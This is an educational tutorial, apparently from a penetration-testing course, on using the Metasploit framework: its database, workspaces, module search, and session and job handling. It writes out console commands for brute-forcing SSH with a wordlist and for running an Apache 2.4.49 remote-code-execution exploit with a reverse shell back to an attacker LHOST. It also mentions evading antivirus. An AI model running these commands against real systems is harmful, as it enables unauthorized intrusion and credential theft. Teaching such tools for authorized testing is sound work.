The Tool That Ties It Together
Public exploits are messy.
Every one is written differently. They break, they need patching, and you have to read each one before you dare run it. On top of that, every engagement drags in a zoo of separate tools for scanning, brute forcing, and post-exploitation.
A framework tidies all of it into one place.
Metasploit is the big open-source one. It bundles thousands of exploits, a library of payloads, post-exploitation modules, and, crucially, it keeps track of everything you break into so you’re not juggling a dozen terminals.
Metasploit’s core idea: split every attack into a swappable exploit and payload, then manage the sessions you collect.
Two Halves: Exploit and Payload
This split is the whole mental model, so let it land.
- The exploit is how you break in. A specific bug in a specific service.
- The payload is what runs once you’re inside. A shell, a Meterpreter, whatever you choose.
They’re independent. Pick an exploit, snap in any compatible payload, fire.
That independence is why the framework is powerful. One exploit, many payloads. Change what happens after the break-in without touching the break-in itself.
Firing It Up
Metasploit uses a database to remember what it finds. Start it once:
Then launch the console:
Confirm the database is wired in:
msf6 > db_status
[*] Connected to msf. Connection type: postgresql. Keep separate engagements from bleeding together with workspaces:
msf6 > workspace -a clientA
[*] Workspace: clientA Everything you discover from here lands in that workspace.
Feeding the Database
Scan straight from the console with db_nmap. Same syntax as nmap, but the results get stored:
msf6 > db_nmap -A 10.10.10.40 Now query what it found:
msf6 > hosts # every discovered host
msf6 > services # every open service
msf6 > services -p 445 # just hosts with 445 open
msf6 > vulns # vulnerabilities Metasploit spotted
msf6 > creds # credentials gathered so far This database is the quiet superpower. Later you can point a module at every host with port 445 open without retyping a single IP.
Working With Modules
Modules are how you do anything in Metasploit. They follow a tidy path-like name:
exploit/windows/smb/psexec
scanner/smb/smb_version Read it left to right: type, then platform, then service, then the module.
Four commands drive every module:
| Command | What it does |
|---|---|
search | find a module (filter by type:, app, CVE, platform) |
use | select it (by full name or search-result index) |
show options | see what you must set (and show missing for just the gaps) |
run | fire it |
You fill in options with set NAME value and clear them with unset.
Auxiliary Modules
Auxiliary modules do everything short of dropping a payload: scanning, enumeration, fuzzing, brute forcing.
Find and run one:
msf6 > search type:auxiliary smb
msf6 > use scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.40
msf6 auxiliary(scanner/smb/smb_version) > run Some do real work. scanner/ssh/ssh_login brute-forces SSH, and on success it opens a session for you automatically:
msf6 > use scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.40
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME alex
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run You didn’t just find a password. You landed on the box.
Exploit Modules
Exploit modules are the business end: code that breaks a vulnerable service.
Before you fire, read the module. info tells you the supported targets, whether it’s repeatable, whether it leaves artifacts-on-disk, and whether check can safely confirm the target is vulnerable first:
msf6 > search Apache 2.4.49
msf6 > use exploit/multi/http/apache_normalize_path_rce
msf6 exploit(...) > info
msf6 exploit(...) > show options Set your target, pick a payload, and point the payload back at yourself:
msf6 exploit(...) > set RHOSTS 10.10.10.40
msf6 exploit(...) > set payload linux/x64/shell_reverse_tcp
msf6 exploit(...) > set LHOST 10.10.14.5
msf6 exploit(...) > run
LHOSTandLPORTare your address, where the shell comes home to. Metasploit stands up the matching listener for you, so no separate Netcat needed.
Sessions and Jobs
Here’s the payoff. Every shell you catch becomes a numbered session, all held in the one console.
msf6 > sessions -l # list every session
msf6 > sessions -i 2 # jump into session 2
msf6 > sessions -k 2 # kill session 2 Inside a session, Ctrl+Z backgrounds it, still alive, while you move on.
And run -j launches a module as a background job, so a listener can sit waiting for the next shell while you keep working:
msf6 exploit(...) > run -j
msf6 > jobs # list background jobs This is why frameworks scale. Ten machines, one console, no lost terminals.
The Honest Caveat
Metasploit is a force multiplier, not a magic wand.
It is also loud. Its payloads and modules are among the most heavily signatured code in existence, so antivirus and defenders flag them fast.
Treat it as a power tool, not a crutch. Know how to break in and clean up by hand too. A common move: land a plain shell first, then deploy Meterpreter only once you’ve dealt with the defenses.
That plain-shell-versus-Meterpreter choice is really a choice of payload, which is the next note.